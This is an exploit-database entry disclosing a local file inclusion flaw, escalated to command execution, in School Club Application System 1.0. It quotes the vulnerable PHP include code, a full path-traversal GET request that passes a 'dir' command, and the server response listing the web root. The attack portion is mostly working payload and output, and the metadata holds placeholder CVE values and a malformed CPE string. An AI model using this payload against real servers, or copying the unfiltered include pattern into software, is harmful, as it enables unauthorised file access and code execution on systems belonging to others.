Exploitalert - Database of Exploits

School Club Application System 1.0 Local File Inclusion

CVE	Category	Price	Severity
CVE-XXXX-XXXX	CWE-XX	$500	High

Author	Risk	Exploitation Type	Date
Unknown	High	Local	2022-04-08

CPE
cpe:cpe:/a:school-club-application-system:1.0

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H	0.0219	0.34981

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2022040033

School Club Application System 1.0 Local File Inclusion

# Title: School Club Application System 1.0 LFI To RCE # Author: Hejap Zairy # Date: 08.04.2022 # Vendor: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scas_0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache #vulnerability Code php Needs more filtering require_once ``` <?php require_once('config.php'); $page = isset($_GET['page']) ? $_GET['page'] : 'home'; $page_name = explode("/",$page)[count(explode("/",$page)) -1]; ?> ``` [+] Payload GET ``` GET /scas/?page=../../0day&515=dir HTTP/1.1 Host: 0day.gov Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: ar,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=edh1ho9c9skog6v2ns0n0j3f2k Connection: close ``` #Status: CRITICAL #Response ``` HTTP/1.1 200 OK Date: Fri, 08 Apr 2022 04:05:58 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13563 </h1> <p class="lead text-white mt-3">.. .. 0day Page</p> </div> </div> </div> </div> </header> <div class="card card-body blur shadow-blur mx-3 mx-md-4 mt-n6"> Volume in drive C is OS Volume Serial Number is 2EF1-9DCA Directory of C:\xampp\htdocs\scas 04/08/2022 06:27 AM <DIR> . 04/08/2022 06:27 AM <DIR> .. 03/19/2021 01:17 PM 225 .htaccess 04/07/2022 10:03 AM 2,115 about.html 03/30/2022 04:31 PM 220 about.php 04/07/2022 03:56 PM <DIR> admin 04/08/2022 06:27 AM <DIR> assets 03/29/2022 04:17 PM <DIR> classes 04/07/2022 03:20 PM <DIR> clubs 04/07/2022 04:33 PM <DIR> club_admin 04/07/2022 02:39 PM <DIR> club_contents 03/30/2022 10:03 AM 1,297 config.php 04/07/2022 05:13 PM <DIR> database 03/30/2022 04:31 PM 256 home.php 03/29/2022 10:24 AM <DIR> includes 04/07/2022 03:18 PM 3,010 index.php 04/07/2022 09:35 AM 647 initialize.php 04/07/2022 08:18 AM <DIR> uploads 04/07/2022 10:03 AM 1,842 welcome.html 8 File(s) 9,612 bytes 11 Dir(s) 81,520,218,112 bytes free </div> ``` # Description: Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce # Proof and Exploit: https://i.imgur.com/3MbzZuQ.png https://i.imgur.com/mqXb1Mc.png

Impressum